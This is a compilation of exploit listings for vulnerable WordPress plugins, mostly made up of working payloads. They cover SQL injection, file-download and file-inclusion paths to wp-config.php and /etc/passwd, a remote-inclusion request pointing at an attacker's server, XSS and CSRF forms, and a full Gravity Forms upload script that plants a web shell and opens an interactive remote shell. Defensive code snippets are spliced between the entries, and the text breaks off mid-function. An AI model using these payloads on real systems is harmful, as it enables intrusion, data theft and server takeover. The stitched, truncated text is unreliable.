# # # # # 
# Exploit Title: Hospital Management System for Wordpress - SQL Injection
# Dork: N/A
# Date: 26.09.2017
# Vendor Homepage: http://mojoomla.com/
# Software Link: https://codecanyon.net/item/hospital-management-system-for-wordpress/12094634
# Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/hospital/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows student members to inject SQL commands....
# 
# Proof of Concept: 
# 
# http://localhost/[PATH]/?dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]
# 
# -50++UNION(SELECT(1),(2),(3),(4),(5),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(7),(8))--+-
# 
# Etc..
# # # # #
            
# Exploit Title: Wordpress History Collection <=1.1.1 Arbitrary File Download
# Google Dork: inurl:plugins/history-collection
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link: https://wordpress.org/plugins/history-collection/
# Version: <=1.1.1
# Tested on: Linux

1. Description:
The Wordpress history collection plugin contains a file called download.php
which does not filter the GET input; it then uses this GET value to
force the download of a file.
(download.php, line 44):
header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );

2. Proof of concept:
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=yourfile
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php
php -r "echo @file_get_contents('http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php');"

Greetz:
Moh Ooasiic, Virus Os, Black Sniper, T3N38R15, Green Ghost, n37_worm,
MuhmadEmad, redsm0ke
By Kuroi'SH
            
Title: Helpful 2.4.11 Sql Injection  - Wordpress Plugin
Version : 2.4.11
Software Link : https://wordpress.org/plugins/helpful/
Date found: 10.04.2019
Author: Numan Türle


core/Core.class.php
// Ajax requests: pro
add_action( 'wp_ajax_helpful_ajax_pro', array( $this, 'helpful_ajax_pro' ) );

// set args for insert command
$args = array(
'post_id' => $_REQUEST['post_id'],
'user' => $_REQUEST['user'],
'pro' => $_REQUEST['pro'],
'contra' => $_REQUEST['contra']
);
$result = $this->insert( $args );

@params = 'post_id' => $_REQUEST['post_id'],
call function insert -->

if( !$args['post_id'] ) return false;
$check = $wpdb->get_results("SELECT post_id,user FROM $table_name WHERE user = '$user' AND post_id = $post_id");



Payload :
GET /wp-admin/admin-ajax.php?action=helpful_ajax_pro&contra=0&post_id=if(1=1,sleep(10),0)&pro=1&user=1
            
source: https://www.securityfocus.com/bid/69105/info

The WordPress HDW Player plugin (Video Player & Video Gallery) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

HDW Player 2.4.2 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-admin/admin.php?page=videos&opt=edit&id=2 union select 1,2,user(),4,5,6,database(),8,@@version,10,11,12 
            
source: https://www.securityfocus.com/bid/53967/info

HD FLV Player plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

HD FLV Player 1.7 is vulnerable; other versions may also be affected. 

Exploit :

PostShell.php
<?php

$uploadfile="lo.php.jpg";
$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/contus-hd-flv-player/uploadVideo.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('myfile'=>"@$uploadfile",
                'mode'=>'image'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : 
http://www.example.com/wordpress/wp-content/uploads/18_lo.php.jpg
Filename : [CTRL-u] PostShell.php after executed

lo.php.jpg
<?php
phpinfo();
?>
            
# Exploit Title: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Download
# Exploit Author: CrashBandicot
# Date: 2016-03-22
# Google Dork : inurl:/wp-content/plugins/hb-audio-gallery-lite
# Vendor Homepage: https://fr.wordpress.org/plugins/hb-audio-gallery-lite/
# Tested on: MSWin32
# Version: 1.0.0

# Vuln file : gallery/audio-download.php

if( $_REQUEST['file_size'] && $_REQUEST['file_path'] ) {
    $file_size =  $_REQUEST['file_size'];
    $file =  $_REQUEST['file_path'];
    $filename = basename($file);
....
        Header("Content-Disposition: attachment; filename='" . $filename . "'");


# PoC : /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10


# 22/03/2016 - Informed Vendor about Issue
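As an added example (not code from either plugin), the download-by-name logic from the History Collection and HB Audio Gallery listings above, rewritten so the requested name is resolved with realpath() and refused unless the result stays inside a fixed download root; the function names and the download root are hypothetical.

```php
<?php
// Added example, not code from the History Collection or HB Audio Gallery plugins.
// Hypothetical names: gallery_download_path(), send_download(), $base_dir.

// Resolve a user-supplied name against a fixed directory and return the real
// path only if it stays inside that directory; otherwise return null.
function gallery_download_path(string $base_dir, string $requested): ?string
{
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;                        // empty or NUL-containing names are never valid
    }
    $base = realpath($base_dir);
    if ($base === false) {
        return null;                        // the download root itself must exist
    }
    // realpath() collapses "..", "." and symlinks, so the check below sees the
    // final filesystem location rather than the text the client sent.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($candidate === false || !is_file($candidate)) {
        return null;                        // no such file (or it is a directory)
    }
    // Confinement: the resolved path must start with "<root>/".
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                        // "../../../wp-config.php" is rejected here
    }
    return $candidate;
}

// Stream a file that has already passed gallery_download_path().
function send_download(string $path): void
{
    // basename() is applied to the *resolved* path, so the header carries no separators.
    $name = basename($path);
    header('Content-Type: application/octet-stream');
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: attachment; filename="' . addcslashes($name, "\"\\") . '"');
    header('Content-Length: ' . (string) filesize($path));
    readfile($path);
}

// Demo on a constructed layout: a download root with one track, and a
// "wp-config.php" one level above it that must stay unreachable.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'gallery_demo_' . getmypid();
mkdir($root . '/uploads', 0700, true);
file_put_contents($root . '/uploads/track.mp3', 'audio bytes');
file_put_contents($root . '/wp-config.php', 'DB_PASSWORD');

foreach (['track.mp3', '../wp-config.php', 'sub/../../wp-config.php', '/etc/passwd'] as $req) {
    $resolved = gallery_download_path($root . '/uploads', $req);
    printf("%-28s -> %s\n", $req, $resolved === null ? 'rejected' : 'allowed: ' . basename($resolved));
}

// Remove the constructed files again.
unlink($root . '/uploads/track.mp3');
unlink($root . '/wp-config.php');
rmdir($root . '/uploads');
rmdir($root);
```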
            
Advisory ID: HTB23275
Product: Gwolle Guestbook WordPress Plugin
Vendor: Marcel Pol
Vulnerable Version(s): 1.5.3 and probably prior
Tested Version: 1.5.3
Advisory Publication:  October 14, 2015  [without technical details]
Vendor Notification: October 14, 2015 
Vendor Patch: October 16, 2015 
Public Disclosure: November 4, 2015 
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8351
Risk Level: Critical 
CVSSv3 Base Score: 9.0 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a critical Remote File Inclusion (RFI) in Gwolle Guestbook WordPress plugin, which can be exploited by non-authenticated attacker to include remote PHP file and execute arbitrary code on the vulnerable system.  

HTTP GET parameter "abspath" is not properly sanitized before being used in the PHP require() function. A remote attacker can include a file named 'wp-load.php' from an arbitrary remote server and execute its content on the vulnerable web server. To do so, the attacker needs to place a malicious 'wp-load.php' file in his server's document root and include the server's URL in the request:

http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]

In order to exploit this vulnerability, 'allow_url_include' must be set to 1. Otherwise, an attacker may still include local files and also execute arbitrary code. 

Successful exploitation of this vulnerability will lead to entire WordPress installation compromise, and may even lead to the entire web server compromise. 


-----------------------------------------------------------------------------------------------

Solution:

Update to Gwolle Guestbook 1.5.4

More Information:
https://wordpress.org/plugins/gwolle-gb/changelog/

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23275 - https://www.htbridge.com/advisory/HTB23275 - PHP File Inclusion in Gwolle Guestbook WordPress Plugin.
[2] Gwolle Guestbook WordPress Plugin - https://wordpress.org/plugins/gwolle-gb/ - Gwolle Guestbook is the WordPress guestbook you've just been looking for.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
            
<?php
/****************************************************************************************************************************
   *
	* Exploit Title        : Gravity Forms [WP] - Arbitrary File Upload
	* Vulnerable Version(s): 1.8.19 (and below)
	* Write-Up             : https://blog.sucuri.net/2015/02/malware-cleanup-to-arbitrary-file-upload-in-gravity-forms.html
	* Coded by             : Abk Khan [ an0nguy @ protonmail.ch ]
  *
*****************************************************************************************************************************/
error_reporting(0);

echo "
   _____                 _ _         ______    _ _     
  / ____|               (_) |       |  ____|  | | |    
 | |  __ _ __ __ ___   ___| |_ _   _| |__ __ _| | |___ 
 | | |_ | '__/ _` \ \ / / | __| | | |  __/ _` | | / __|
 | |__| | | | (_| |\ V /| | |_| |_| | | | (_| | | \__ \
  \_____|_|  \__,_| \_/ |_|\__|\__, |_|  \__,_|_|_|___/
                                __/ |                  
                               |___/     > an Exploiter by AnonGuy\n";
$domain    = (@$argv[1] == '' ? 'http://localhost/wordpress' : @$argv[1]);
$url       = "$domain/?gf_page=upload";
$shell     = "$domain/wp-content/_input_3_khan.php5";
$separator = '-------------------------------------------------------------------';

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, '<?php system($_GET[0]); ?>&form_id=1&name=khan.php5&gform_unique_id=../../../../&field_id=3');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

if (strpos($response, '"ok"') !== false) {
    echo "$separator\nShell at $shell\n$separator\nSpawning a 'No-Session' Shell . . . Done!\n$separator\n";
    $testCom = '';                  // initialised so the first loop test does not read an undefined variable
    while ($testCom != 'exit') {
		$user    = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20whoami;%20echo%20'~'"), '~', '~'));
		$b0x     = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20hostname;%20echo%20'~'"), '~', '~'));
        echo "$user@$b0x:~$ ";
        $handle  = fopen("php://stdin", 'r');
        $testCom = trim(fgets($handle));
        fclose($handle);
        $comOut  = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20" . urlencode($testCom) . ";%20echo%20'~'"), '~', '~')) . "\n";
        echo $comOut;
    }
}
else {
	die("$separator\n$domain doesn't seem to be vulnerable! :(\n$separator");
}

function get_string_between($string, $start, $end)
{
    # stolen from stackoverflow!
    $string = ' ' . $string;
    $ini    = strpos($string, $start);
    if ($ini == 0)
        return '';
    $ini += strlen($start);
    $len = strpos($string, $end, $ini) - $ini;
    return substr($string, $ini, $len);
}
?>
            
source: https://www.securityfocus.com/bid/53511/info

The GRAND Flash Album Gallery plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

GRAND Flash Album Gallery 1.71 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-admin/admin.php?page=flag-skins&skin=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E 
            
source: https://www.securityfocus.com/bid/51012/info

GRAND FlAGallery plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

GRAND FlAGallery 1.57 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/wp-content/plugins/flash-album-gallery/flagshow.php?pid=[xss] 
            
=============================================
MGC ALERT 2019-001
- Original release date: February 06, 2019
- Last revised:  March 13, 2019
- Discovered by: Manuel García Cárdenas
- Severity: 7/10 (CVSS Base Score)
- CVE-ID: CVE-2019-9618
=============================================

I. VULNERABILITY
-------------------------
WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion

II. BACKGROUND
-------------------------
Hassle-free and user-friendly way to add a Media player directly to your
website.

III. DESCRIPTION
-------------------------
This bug was found in the file:

/gracemedia-media-player/templates/files/ajax_controller.php

Vulnerable code:

require_once($_GET['cfg']);

The parameter "cfg" is not sanitized, allowing local files to be included.

To exploit the vulnerability, it is only necessary to use version 1.0 of the HTTP
protocol to interact with the application.

IV. PROOF OF CONCEPT
-------------------------
The following URL has been confirmed to be vulnerable to local file
inclusion.

Local File Inclusion POC:

GET
/wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-------------------------
GraceMedia Media Player <= 1.0

VII. SOLUTION
-------------------------
Disable the plugin until a fix is available; the vendor has not fixed it after 2
requests.

VIII. REFERENCES
-------------------------
https://es.wordpress.org/plugins/gracemedia-media-player/

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-------------------------
February 06, 2019 1: Initial release
March 13, 2019 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-------------------------
February 06, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas
February 06, 2019 2: Email to vendor without response
February 21, 2019 3: Second email to vendor without response
March 13, 2019 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester
            
<html>
    <!--

        GoURL Unrestricted Upload Vulnerability POC by @pouyadarabi      
        CWE-434

        Vulnerable Function: https://github.com/cryptoapi/Bitcoin-Wordpress-Plugin/blob/8aa17068d7ba31a05f66e0ab2bbb55efb0f60017/gourl.php#L5637
        
        Details:
        
          After checking the file extension, a substring of the file name (its first 95 characters) was used as the stored name (line #5655).
          So entering a file name like "123456789a123456789b123456789c123456789d123456789e123456789f123456789g123456789h123456789i1.php.jpg"
          will upload a file with a .php extension to the website :)

    -->

<body>

    <!--

        Replace http://127.0.0.1/wp/ with target wordpress website
        Fill id param in form action to any active download product

    -->

    <form action="http://127.0.0.1/wp/?page=gourlfile&id=1" method="POST" enctype="multipart/form-data">

        <input type="file" name="gourlimage2" />
        <input type="submit"/>
        
    </form>

    <a href="http://127.0.0.1/wp/wp-content/uploads/gourl/images/i123456789a123456789b123456789c123456789d123456789e123456789f123456789g123456789h123456789i1.php">Shell link</a>

</body>

</html>
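As an added example (not GoURL's code), the two orderings from the details above side by side: validating before truncation, which leaves the earlier ".php" as the stored extension, and shortening only the base name before validating the final name; the function names and the allowed-extension list are assumptions.

```php
<?php
// Added example, not GoURL's code. It reproduces the ordering bug described
// above in two hypothetical functions and shows the order that closes it.

const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif'];   // assumed allow-list
const MAX_NAME    = 95;                             // the truncation length from the listing

function ext_allowed(string $name): bool
{
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    return in_array($ext, ALLOWED_EXT, true);
}

// Vulnerable order: validate the name the client sent, then shorten it.
// The validated ".jpg" can fall off the end, leaving an earlier ".php".
function stored_name_vulnerable(string $upload): ?string
{
    if (!ext_allowed($upload)) {
        return null;
    }
    return substr($upload, 0, MAX_NAME);
}

// Safe order: build the final on-disk name first, then validate *that* name.
// Only the base part is shortened, so the extension checked is the one stored.
function stored_name_safe(string $upload): ?string
{
    $ext  = strtolower(pathinfo($upload, PATHINFO_EXTENSION));
    $base = pathinfo($upload, PATHINFO_FILENAME);
    $base = preg_replace('/[^A-Za-z0-9_-]/', '_', $base);  // no dots, slashes or NULs remain
    $base = substr($base, 0, MAX_NAME - strlen($ext) - 1);
    if ($base === '') {
        return null;
    }
    $final = $base . '.' . $ext;
    return ext_allowed($final) ? $final : null;
}

// Constructed probe with the shape from the listing: 99 characters whose
// 95-character prefix ends in ".php".
$probe = '';
foreach (range('a', 'i') as $letter) {
    $probe .= '123456789' . $letter;
}
$probe .= '1.php.jpg';

foreach (['stored_name_vulnerable', 'stored_name_safe'] as $fn) {
    $stored = $fn($probe);
    printf("%-24s length %d, extension %s\n", $fn, strlen((string) $stored),
        $stored === null ? 'rejected' : pathinfo($stored, PATHINFO_EXTENSION));
}
```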
            
[+] Exploit Title : Wordpress Googmonify Plug-in XSS/CSRF
[+] Exploit Author : Ehsan Hosseini
[+] Date: 2015-08-21
[+] Vendor Homepage : https://wordpress.org/plugins/googmonify/
[+] Software Link : https://downloads.wordpress.org/plugin/googmonify.zip
[+] Version : 0.8.1
[+] Tested On : Windows FireFox
[+] CVE : N/A

===============================
Vulnerable Code : googmonify.php - Line 190,194,208
<input id="PID" name="PID" type="text" value="<?php echo $pid; ?>">
<input id= "Limit" name="Limit" type="text" value="<?php echo $limit; ?>" size="5">
<input id="AID" name="AID" type="text" value="<?php echo $aid; ?>">
===============================
Exploit 1 (Just CSRF):

<form method="POST"
action="http://[URL]/[Path]/wp-admin/options-general.php?page=googmonify.php">
<input name="PID" type="hidden" value='Ehsan Hosseini'>
<input name="Limit" type="hidden" value="0">
<input name="Analytics" type="hidden" value="0" >
<input name="AID" type="hidden" value="Ehsan Hosseini">
<input name="GoogmonifyUpdate" type="submit" value="Update Options &raquo;">
</form>

Exploit 2 (CSRF & XSS):

<form method="POST"
action="http://[URL]/[Path]/wp-admin/options-general.php?page=googmonify.php">
<input name="PID" type="hidden"
value='"><script>alert(document.cookie)</script>'>
<input name="Limit" type="hidden" value="0">
<input name="Analytics" type="hidden" value="0" >
<input name="AID" type="hidden" value='"><script>alert(/Ehsan Hosseini/)</script>'>
<input name="GoogmonifyUpdate" type="submit" value="Update Options &raquo;">
</form>
===============================
Patch :  googmonify.php - Line 190,194,208
<input id="PID" name="PID" type="text" value="<?php echo htmlspecialchars($pid); ?>">
<input id= "Limit" name="Limit" type="text" value="<?php echo htmlspecialchars($limit); ?>" size="5">
<input id="AID" name="AID" type="text" value="<?php echo htmlspecialchars($aid); ?>">

===============================
Discovered By : Ehsan Hosseini.
            
# Exploit Title: Wordpress Plugin Google Review Slider 6.1 - 'tid' SQL Injection
# Google Dork: inurl:"/wp-content/plugins/wp-google-places-review-slider/"
# Date: 2019-07-02
# Exploit Author: Princy Edward
# Exploit Author Blog : https://prinyedward.blogspot.com/
# Vendor Homepage: https://wordpress.org/plugins/wp-google-places-review-slider/
# Version: 6.1
# Tested on: Apache/2.2.24 (CentOS)
# CVE : 

#POC :

GET /wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=***&taction=edit HTTP/1.1

#SQLMAP Result :
sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
---
Parameter: tid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=wp_google-templates_posts&tid=1 AND (SELECT 5357 FROM (SELECT(SLEEP(5)))kHQz)&_wpnonce=***&taction=edit

# Changeset:
# Issue fixed in version 6.2
# https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2180197%40wp-google-places-review-slider&old=2163061%40wp-google-places-review-slider&sfp_email=&sfph_mail=

Cheers!
PrincyEdward
            
# Title: WordPress Google Map Plugin < 4.0.4 - SQL Injection
# Author: defensecode
# Date: 2018-06-12
# Software: WordPress WP Google Map plugin
# Version: 4.0.4 and below
# Vendor Status:  Vendor contacted, no response

# Vulnerability Description
# The easiest way to reproduce the vulnerabilities is to visit the
# provided URL while being logged in as administrator or another user
# that is authorized to access the plugin settings page. Users that do
# not have full administrative privileges could abuse the database
# access the vulnerabilities provide to either escalate their privileges
# or obtain and modify database contents they were not supposed to be
# able to.

# Due to the missing nonce token, the vulnerable code is also directly
# exposed to attack vectors such as Cross Site request forgery (CSRF).

# SQL injection
# Vulnerable Function:  $wpdb->get_results()
# Vulnerable Variable:  $_GET['order']
# Vulnerable URL:

http://vulnerablesite.com/wp-admin/admin.php?page=wpgmp_manage_location&orderby=location_address&order=asc PROCEDURE ANALYSE(EXTRACTVALUE(4242,CONCAT(0x42,(BENCHMARK(42000000,MD5(0x42424242))))),42)


# SQL injection
# Vulnerable Function:  $wpdb->get_results()
# Vulnerable Variable:  $_GET['orderby']
# Vulnerable URL:

http://vulnerablesite.com/wp-admin/admin.php?page=wpgmp_manage_location&order=asc&orderby=location_address%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(555)))xxx)&order=asc

# Disclosure Timeline
# 2018/05/11   Vulnerabilities discovered
# 2018/05/16   Vendor contacted
# 2018/06/08   No response
# 2018/06/12   Advisory released to the public
            
# Exploit Title:  Plugin Google Drive for WordPress 2.2 – RCE – Unlik
# Date: 08/04/2018
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/wp-google-drive/
# Software Link: https://wordpress.org/plugins/wp-google-drive/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 2.2
# Tested on: Ubuntu 16.1

1 - Description


   - Type of user access: no login needed.
   - $_POST['file_name'] is not escaped.

2. Proof of Concept

1 - Send data form:

<form method="post"
      action="http://target/wp-content/plugins/wp-google-drive/gdrive-ajaxs.php">
   <input type="text" name="ajaxstype" value="del_fl_bkp">
   <input type="text" name="file_name" value="../../wp-config.php">
   <input type="text" name="id" value="1">
   <input type="submit">
</form>


#   - Date Discovery : 11/25/2017
#   - Date Vendor Contact : 12/26/2017
#   - Date Publish : 08/04/2018
#   - Date Resolution :
            
Exploit Title : Google Document Embedder 2.5.16 mysql_real_escape_string bypass SQL Injection
Date : 2014-12-03
Exploit Author : Securely (Yoo Hee man)
Plugin : google-document-embedder
Fixed version : N/A
Software Link : https://downloads.wordpress.org/plugin/google-document-embedder.2.5.16.zip

1. Detail 
- Google Document Embedder v2.5.14 has an SQL Injection
- This plugin's v2.5.16 was patched against the SQL Injection using the mysql_real_escape_string function
- but the mysql_real_escape_string() function can be bypassed
- vulnerable file : /google-document-embedder/~view.php

================================================================
// get profile
if ( isset( $_GET['gpid'] ) ) {
	$gpid = mysql_real_escape_string( $_GET['gpid'] );
	// mysql_real_escape_string() can be bypassed here: it only escapes quote
	// characters, and $gpid is interpolated unquoted into the query below
	if ( $profile = gde_get_profile( $gpid ) ) {
		$tb = $profile['tb_flags'];
		$vw = $profile['vw_flags'];
		$bg = $profile['vw_bgcolor'];
		$css = $profile['vw_css'];
	}
}
================================================================

===============================================================
function gde_get_profile( $id ) {
	global $wpdb;
	$table = $wpdb->prefix . 'gde_profiles';

	$profile = $wpdb->get_results( "SELECT * FROM $table WHERE profile_id = $id", ARRAY_A );
	$profile = unserialize($profile[0]['profile_data']);

	if ( is_array($profile) ) {
		return $profile;
	} else {
		return false;
	}
}
================================================================

2. POC
http://target/wp-content/plugins/google-document-embedder/~view.php?embedded=1&gpid=0%20UNION%20SELECT%201,%202,%203,%20CONCAT(CAST(CHAR(97,%2058,%2049,%2058,%20123,%20115,%2058,%2054,%2058,%2034,%20118,%20119,%2095,%2099,%20115,%20115,%2034,%2059,%20115,%2058)%20as%20CHAR),%20LENGTH(user_login),%20CAST(CHAR(58,%2034)%20as%20CHAR),%20user_login,%20CAST(CHAR(34,%2059,%20125)%20as%20CHAR))%20FROM%20wp_users%20WHERE%20ID=1

3. Solution:
Not patched

4. Discovered By : Securely(Yoo Hee man)
                 God2zuzu@naver.com
            
# Exploit Title: Wordpress Plugin Good LMS 2.1.4 - 'id' Unauthenticated SQL Injection
# Software Link: https://codecanyon.net/item/good-lms-learning-management-system-wp-plugin/9033850
# Version: <= 2.1.4
# Dork: N/A
# Author: Abdulazeez Alaseeri
# Tested on: linux/apache
# Type: Web App
# Date: 2020-11-12
# Category: Web App


================================================================
Unauthenticated SQL Injection in Good Layers LMS Plugin <= 2.1.4
================================================================

Plugin URL: https://codecanyon.net/item/good-lms-learning-management-system-wp-plugin/9033850

Following is the vulnerable code in file "goodlayers-lms/include/lightbox-form.php" from line 682 to 701
================================================================
Start Vulnerable Code
================================================================
682-	add_action( 'wp_ajax_gdlr_lms_cancel_booking', 'gdlr_lms_cancel_booking' );
683-	add_action( 'wp_ajax_nopriv_gdlr_lms_cancel_booking', 'gdlr_lms_cancel_booking' );
684-	function gdlr_lms_cancel_booking(){
685-		global $wpdb;
686-
687-		$sql  = 'SELECT * FROM ' . $wpdb->prefix . 'gdlrpayment ';
688-		$sql .= 'WHERE id=' . $_POST['id'] . ' AND ';
689-		$sql .= '(payment_status=\'pending\' OR payment_status=\'submitted\' OR payment_status=\'reserved\')';
690-		$booked_course = $wpdb->get_row($sql);
691-		if( !empty($booked_course) ){
692-			$payment_info = unserialize($booked_course->payment_info);
693-
694-			$course_options = gdlr_lms_get_course_options($booked_course->course_id);
695-			$course_options['booked-seat'] = intval($course_options['booked-seat']) - intval($payment_info['amount']);
696-			update_post_meta($booked_course->course_id, 'gdlr-lms-course-settings', wp_slash(json_encode($course_options, JSON_UNESCAPED_UNICODE)));
697-
698-			$wpdb->delete( $wpdb->prefix . 'gdlrpayment', array('id'=>$_POST['id']), array('%d'));
699-		}
700-		die("");
701-	}
================================================================
End Vulnerable Code
================================================================
Line 682 means that the function "gdlr_lms_cancel_booking" can be called via "/wp-admin/admin-ajax.php" by any low-privileged account such as a subscriber or contributor. However, the "nopriv" in line 683 means that the same function "gdlr_lms_cancel_booking" can also be called as an unauthenticated user. The following URL means that an attacker is already inside the function "gdlr_lms_cancel_booking".

http://www.example.com/wp-admin/admin-ajax.php?action=gdlr_lms_cancel_booking

The SQL injection on line 688 is simple to understand: arbitrary user input from the POST request is sent straight into the MySQL query as the variable "id".

$sql .= 'WHERE id=' . $_POST['id'] . ' AND ';

Following are the request headers as a POC, which demonstrate a MySQL SLEEP query.

================================================================
Request Headers Start
================================================================
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded

action=gdlr_lms_cancel_booking&id=(SELECT 1337 FROM (SELECT(SLEEP(10)))MrMV)
================================================================
Request Headers Finish
================================================================
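As an added example (not the plugin's code), the cancel-booking handler from the Good LMS listing rewritten so the id never reaches MySQL as raw text; the same %d placeholder closes the unquoted numeric interpolation shown in the Helpful and Google Document Embedder listings above. It assumes a WordPress runtime ($wpdb, check_ajax_referer(), absint(), wp_send_json_error()); the nonce action name and the user_id ownership column are hypothetical, and the seat-count bookkeeping from the original is left out.

```php
<?php
// Added example, not the Good LMS plugin's code. Assumes it is loaded inside
// WordPress. Hypothetical: the nonce action name and the user_id column.

add_action( 'wp_ajax_gdlr_lms_cancel_booking', 'gdlr_lms_cancel_booking_safe' );
// No wp_ajax_nopriv_ registration: cancelling a booking is not an anonymous action.

function gdlr_lms_cancel_booking_safe() {
    global $wpdb;

    // CSRF guard: the request must carry a nonce issued to this logged-in user.
    check_ajax_referer( 'gdlr_lms_cancel_booking', 'nonce' );

    // absint() reduces "(SELECT 1337 FROM (SELECT(SLEEP(10)))MrMV)" to 0.
    $id = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;
    if ( 0 === $id ) {
        wp_send_json_error( 'invalid id', 400 );
    }

    $table = $wpdb->prefix . 'gdlrpayment';
    // prepare() casts %d to an integer; the value never becomes part of the SQL text.
    $booked_course = $wpdb->get_row(
        $wpdb->prepare(
            "SELECT * FROM {$table} WHERE id = %d AND payment_status IN ('pending','submitted','reserved')",
            $id
        )
    );
    if ( empty( $booked_course ) ) {
        wp_send_json_error( 'not found', 404 );
    }

    // Authorisation: only the booking owner (or an administrator) may cancel it.
    // user_id is a hypothetical column; the listing does not show the table schema.
    if ( (int) $booked_course->user_id !== get_current_user_id() && ! current_user_can( 'manage_options' ) ) {
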